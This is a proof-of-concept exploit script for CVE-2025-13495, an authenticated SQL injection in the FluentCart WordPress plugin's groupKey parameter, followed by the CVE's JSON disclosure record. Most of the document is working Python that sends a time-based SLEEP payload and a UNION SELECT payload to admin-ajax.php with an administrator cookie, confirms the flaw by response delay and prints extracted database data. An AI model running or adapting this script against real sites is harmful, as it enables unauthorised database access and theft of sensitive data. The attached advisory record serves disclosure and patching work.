CVE-2025-13495

import requests import sys # CVE-2025-13495 PoC - FluentCart SQL Injection via groupKey parameter # Target: WordPress site with FluentCart plugin <= 1.3.1 # Authentication: Requires Administrator-level access TARGET_URL = "http://target-wordpress-site.com" COOKIES = { "wordpress_logged_in_xxx": "admin_session_token" } def test_sql_injection(): """Test for SQL injection vulnerability in groupKey parameter""" # Basic injection test - time-based blind SQLi payload = "test' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '1'='1" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" params = { "action": "fluentcart_revenue_report", "groupKey": payload, "report_type": "daily" } print(f"[*] Testing SQL injection on {TARGET_URL}") print(f"[*] Payload: {payload}") try: response = requests.get( endpoint, params=params, cookies=COOKIES, timeout=10 ) if response.elapsed.total_seconds() >= 5: print("[+] SQL Injection confirmed! Server delayed response.") return True else: print("[-] No obvious SQL injection detected") return False except requests.exceptions.RequestException as e: print(f"[!] Request error: {e}") return False def extract_data(): """Extract database version using UNION-based injection""" # UNION-based injection to extract database version payload = "-1' UNION SELECT NULL,@@version,NULL,NULL,NULL-- -" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" params = { "action": "fluentcart_revenue_report", "groupKey": payload, "report_type": "daily" } try: response = requests.get( endpoint, params=params, cookies=COOKIES, timeout=30 ) print(f"[*] Response status: {response.status_code}") # Parse response to extract database version return response.text except requests.exceptions.RequestException as e: print(f"[!] Request error: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-13495 - FluentCart SQL Injection PoC") print("=" * 60) if test_sql_injection(): print("\n[*] Attempting data extraction...") data = extract_data() if data: print(f"[+] Extracted data: {data[:500]}") else: print("\n[!] Target may not be vulnerable or authentication failed")

{"cve": {"id": "CVE-2025-13495", "sourceIdentifier": "[email protected]", "published": "2025-12-03T04:15:59.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FluentCart plugin for WordPress is vulnerable to SQL Injection via the 'groupKey' parameter in all versions up to, and including, 1.3.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/fluent-cart/tags/1.3.0/app/Services/Report/RevenueReportService.php#L76", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fluent-cart/trunk/app/Services/Report/RevenueReportService.php#L76", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3408039/fluent-cart/tags/1.3.2/app/Services/Report/ReportHelper.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2000b23f-d8a2-4b83-9bf7-b90cb16718f3?source=cve", "source": "[email protected]"}]}}